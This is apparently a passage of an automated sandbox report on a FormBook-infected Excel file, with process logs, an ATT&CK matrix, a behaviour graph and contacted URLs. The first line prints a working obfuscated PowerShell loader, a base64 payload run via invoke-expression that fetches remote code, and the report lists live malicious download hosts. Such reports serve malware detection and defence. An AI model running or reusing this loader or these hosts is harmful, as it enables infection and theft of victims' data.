              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $alastrar = 'jgvzdhjlbgvqyxigpsanahr0chm6ly8xmde2lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1ivfvhx0v5cnveujbpqvpimehisnllcfvywfn2rl9pnmo4yndlvgvxqkn1mtl4y2jquu41vgtzytrprzbncwnjcvdotgxnjnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjc5ndm1nmexzmy2yyanoyrhbwjpz3vpzgfkzsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgvudhjhzgfuagegpsakyw1iawd1awrhzguurg93bmxvywreyxrhkcrlc3ryzwxlamfyktskym9ybmvjbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrlbnryywrhbmhhktskbglxdwlkawzpy2fyid0gjzw8qkftrty0x1nuqvjupj4noyrwaw50b3jhid0gjzw8qkftrty0x0vord4+jzsky2hvdxzpcia9icrib3juzwnvlkluzgv4t2yojgxpcxvpzglmawnhcik7jgltbwvyz2lyid0gjgjvcm5ly28usw5kzxhpzigkcgludg9yysk7jgnob3v2axiglwdlidaglwfuzcakaw1tzxjnaxiglwd0icrjag91dmlyoyrjag91dmlyics9icrsaxf1awrpzmljyxiutgvuz3rooyrmcnv0awzpy2fyid0gjgltbwvyz2lyic0gjgnob3v2axi7jgj1c3nvbgnvid0gjgjvcm5ly28uu3vic3ryaw5nkcrjag91dmlylcakznj1dglmawnhcik7jhf1aw5py2egpsatam9pbiaojgj1c3nvbgnvllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcridxnzb2xjby5mzw5ndggpxtskymvpcmftzsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhf1aw5py2epoyrzywlkb3igpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrizwlyyw1lktskzw5nb3jkdxjhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrlbmdvcmr1cmfylkludm9rzsgkbnvsbcwgqcgndhh0lkfsru5mrvqvmtyzlzixljmyms41ndiumjcxly86chr0accsicckzgfkyw5ljywgjyrkywrhbmunlcanjgrhzgfuzscsicdhc3buzxrfy29tcglszxinlcanjgrhzgfuzscsicckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlcckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlccxjywnjgrhzgfuzscpkts=';$morfose = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($alastrar));invoke-expression $morfoseJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information121
              Scripting              		Valid Accounts111
              Command and Scripting Interpreter              		121
              Scripting              		211
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              Security Software Discovery              		Remote Services1
              Email Collection              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts23
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell              		Logon Script (Windows)Logon Script (Windows)211
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Clipboard Data              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
              Obfuscated Files or Information              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Install Root Certificate              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync14
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1566416 Sample: PI-02911202409#.xla.xlsx Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 65 Suricata IDS alerts for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 14 other signatures 2->71 11 EXCEL.EXE 31 26 2->11         started        process3 dnsIp4 57 172.245.123.12, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->57 59 linkjago.me 188.114.97.6, 443, 49163, 49165 CLOUDFLARENETUS European Union 11->59 45 C:\Users\user\...\~$PI-02911202409#.xla.xlsx, data 11->45 dropped 47 C:\Users\...\seemebestgoodluckthings[1].hta, HTML 11->47 dropped 93 Microsoft Office drops suspicious files 11->93 16 mshta.exe 10 11->16         started        file5 signatures6 process7 dnsIp8 51 linkjago.me 16->51 61 Suspicious command line found 16->61 63 PowerShell case anomaly found 16->63 20 cmd.exe 16->20         started        signatures9 process10 signatures11 77 Suspicious powershell command line found 20->77 79 Wscript starts Powershell (via cmd or directly) 20->79 81 PowerShell case anomaly found 20->81 23 powershell.exe 24 20->23         started        process12 file13 41 C:\...\seemebestthingsentirelifegivenbac.vbS, Unicode 23->41 dropped 43 C:\Users\user\AppData\...\akgiliwf.cmdline, Unicode 23->43 dropped 83 Installs new ROOT certificates 23->83 27 wscript.exe 1 23->27         started        30 csc.exe 2 23->30         started        signatures14 process15 file16 85 Suspicious powershell command line found 27->85 87 Wscript starts Powershell (via cmd or directly) 27->87 89 Windows Scripting host queries suspicious COM object (likely to drop second stage) 27->89 91 Suspicious execution chain found 27->91 33 powershell.exe 12 4 27->33         started        49 C:\Users\user\AppData\Local\...\akgiliwf.dll, PE32 30->49 dropped 37 cvtres.exe 30->37         started        signatures17 process18 dnsIp19 53 ip.1016.filemail.com 142.215.209.77, 443, 49168 HUMBER-COLLEGECA Canada 33->53 55 1016.filemail.com 33->55 73 Writes to foreign memory regions 33->73 75 Injects a PE file into a foreign processes 33->75 39 aspnet_compiler.exe 33->39         started        signatures20 process21

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PI-02911202409#.xla.xlsx11%ReversingLabs
              PI-02911202409#.xla.xlsx10%VirustotalBrowse
              PI-02911202409#.xla.xlsx100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://172.245.123.12/361/sen/seemebestgoodluckthings.htaM0%Avira URL Cloudsafe
              https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T0%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.htau0%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.htahttp://172.245.123.12/361/sen/seemebestgood0%Avira URL Cloudsafe
              https://1016.filemail.com0%Avira URL Cloudsafe
              https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&pet0%Avira URL Cloudsafe
              https://linkjago.me/c0%Avira URL Cloudsafe
              http://172.245.123.12/361/TELNERA.txt0%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.htaE0%Avira URL Cloudsafe
              http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFp0%Avira URL Cloudsafe
              https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat0%Avira URL Cloudsafe
              http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF890%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.htaC:0%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.htastantial&rub=quick&sideboard=divergent&pett0%Avira URL Cloudsafe
              http://172.245.123.12/361/seemeb0%Avira URL Cloudsafe
              https://linkjago.me/0%Avira URL Cloudsafe
              http://172.245.123.12/nt=5&recv=0%Avira URL Cloudsafe
              http://172.245.123.12/0%Avira URL Cloudsafe
              http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF0%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.htatial&rub=quick&sideboa0%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.hta0%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.hta-0%Avira URL Cloudsafe
              https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c0%Avira URL Cloudsafe
              http://172.245.123.12/361/sen/seemebestgoodluckthings.hta6X10%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              linkjago.me
              		188.114.97.6
              		truefalse
                		high
                ip.1016.filemail.com
                		142.215.209.77
                		truetrue
                  		unknown
                  1016.filemail.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://172.245.123.12/361/TELNERA.txttrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoatfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://172.245.123.12/361/sen/seemebestgoodluckthings.htatrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6ctrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://172.245.123.12/361/sen/seemebestgoodluckthings.htahttp://172.245.123.12/361/sen/seemebestgoodmshta.exe, 00000004.00000003.487975537.0000000003335000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petmshta.exe, 00000004.00000002.489449708.000000000027F000.00000004.00000020.00020000.00000000.sdmp, PI-02911202409#.xla.xlsx, 50A30000.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ocsp.entrust.net03mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://172.245.123.12/361/sen/seemebestgoodluckthings.htaumshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://1016.filemail.compowershell.exe, 0000000D.00000002.550062163.00000000022D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://172.245.123.12/361/sen/seemebestgoodluckthings.htaMmshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://linkjago.me/cmshta.exe, 00000004.00000002.489574568.00000000037A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://go.microspowershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFppowershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tpowershell.exe, 0000000D.00000002.550062163.00000000022D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://172.245.123.12/361/sen/seemebestgoodluckthings.htaEmshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF89powershell.exe, 00000008.00000002.512506171.000000001A7EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://172.245.123.12/361/sen/seemebestgoodluckthings.htaC:mshta.exe, 00000004.00000002.489430363.000000000025A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://172.245.123.12/361/seemebpowershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://linkjago.me/mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://172.245.123.12/nt=5&recv=mshta.exe, 00000004.00000002.489574568.00000000037D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://172.245.123.12/361/sen/seemebestgoodluckthings.htastantial&rub=quick&sideboard=divergent&pettmshta.exe, 00000004.00000002.489430363.000000000022E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486065504.000000000027F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489381108.000000000027E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489449708.000000000027F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://172.245.123.12/mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://172.245.123.12/361/sen/seemebestgoodluckthings.htaUmshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://172.245.123.12/361/sen/seemebestgoodluckthings.htatial&rub=quick&sideboamshta.exe, 00000004.00000002.489574568.00000000037A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://172.245.123.12/361/sen/seemebestgoodluckthings.hta-mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.506928711.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.550062163.00000000020D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C068000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://172.245.123.12/361/sen/seemebestgoodluckthings.hta6X1mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
